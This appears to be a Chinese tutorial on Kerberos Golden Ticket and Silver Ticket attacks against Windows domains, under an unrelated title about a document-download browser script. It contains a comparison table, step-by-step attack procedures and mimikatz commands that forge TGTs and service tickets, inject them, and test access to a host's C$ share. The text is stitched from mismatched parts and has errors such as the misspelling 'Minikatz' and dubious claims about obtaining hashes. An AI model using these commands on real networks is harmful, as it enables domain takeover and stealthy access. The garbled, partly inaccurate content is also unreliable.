Kill-Doc:彻底解决在线文档下载难题的浏览器脚本解决方案
2026/5/22 9:32:23
| 对比维度 | 黄金票据(Golden Ticket) | 白银票据(Silver Ticket) |
|---|---|---|
| 伪造对象 | TGT(票据授予票据) | ST(服务票据) |
| 核心依赖密钥 | 域管理员哈希(NTLM Hash)/ 域KRBTGT账户哈希(关键!) | 目标服务对应的服务账户哈希(如CIFS服务用MachineAccount$哈希) |
| 攻击范围 | 全域控制(可访问域控、所有域内主机/服务) | 单一服务权限(仅能访问伪造的目标服务) |
| 是否依赖KDC(域控) | 是(需用伪造TGT向KDC申请ST) | 否(直接伪造ST,无需与KDC交互) |
| 有效期 | 可自定义(默认10小时,最长可设10年) | 固定短有效期(默认10小时,无法大幅延长) |
| 隐蔽性 | 较低(与KDC交互,易被日志审计捕获) | 极高(不碰KDC,域控无日志,难被发现) |
| 获取难度 | 较高(需拿到域KRBTGT账户哈希,需域管权限) | 较低(仅需目标服务账户哈希,普通域用户权限即可尝试) |
黄金票据原理:偷“域级总钥匙”。KRBTGT账户是域控专属的“票据生成账户”,所有TGT都由它的哈希加密生成。
攻击步骤:
① 拿到域KRBTGT账户的NTLM Hash(需域管理员权限,比如通过Minikatz读取域控lsass内存);
② 用Minikatz伪造TGT(黄金票据),自定义有效期和权限;
③ 用伪造TGT向KDC申请任意服务的ST,比如域控管理员服务、文件共享服务等,直接掌控全域。
白银票据原理:偷“单服务钥匙”。每个域内服务(如文件共享CIFS、远程桌面RDP、数据库MSSQL)都有专属服务账户(比如主机默认的MachineAccount账户,格式:主机名),服务启动时会加载该账户哈希,用于验证ST。
攻击步骤:
① 拿到目标服务的服务账户哈希(比如想访问某主机的文件共享,就获取该主机MachineAccount$账户的NTLM Hash,普通域用户可通过枚举获取);
② 用Minikatz直接伪造该服务的ST(白银票据),指定服务类型(如CIFS)和目标主机;
③ 直接用伪造ST访问目标服务(比如访问文件共享、登录远程桌面),全程不与域控交互,无日志残留。
# 核心命令(替换<>内参数)mimikatz.exe"kerberos::golden /user:任意用户名 /domain:域名称(如test.com) /sid:域SID(如S-1-5-21-xxx) /krbtgt:KRBTGT账户NTLM哈希 /ticket:golden.ticket"# 加载票据,获取权限mimikatz.exe"kerberos::ptt golden.ticket"# ptt=Pass The Ticket(票据传递)以“访问目标主机(PC01)的文件共享服务(CIFS)”为例:
# 核心命令(替换<>内参数)mimikatz.exe"kerberos::golden /user:任意用户名 /domain:域名称(如test.com) /sid:域SID /target:目标主机名(如PC01) /service:CIFS /rc4:目标服务账户NTLM哈希(PC01$的哈希) /ticket:silver.ticket"# 加载票据,访问服务mimikatz.exe"kerberos::ptt silver.ticket"dir\\PC01\c$# 测试访问目标主机C盘共享(成功则说明攻击生效)